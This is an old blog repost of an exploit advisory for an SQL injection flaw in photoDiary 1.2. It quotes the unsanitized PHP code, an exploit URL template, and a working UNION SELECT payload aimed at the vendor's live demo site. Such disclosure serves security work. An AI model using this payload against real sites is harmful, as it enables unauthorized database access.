Home vulnerabilities photoDiary 1.2 - SQL Injection Vuln

photoDiary 1.2 - SQL Injection Vuln

By
Friday, November 28, 2008
Read
Add Comment

[o] photoDiary 1.2 SQL Injection Vulnerability
Software : photoDiary version 1.2
Vendor   : http://webgriffe.com/
Download : http://code.google.com/p/photodiary/downloads/list
Author   : NoGe


[o] Vulnerable file
admin/index.php
$act = $_GET['act'];
.....
if($act=="edit" || $act=="new"){
$id = $_GET['id'];


[o] Exploit
http://localhost/[path]/admin/index.php?act=edit&id=[SQL]


[o] Demo
http://photodiary.webgriffe.com/demo/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--


[o] Note
its funny coz usually you do sql to get admin login but this one you must have admin privs to execute sql. lolz


Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us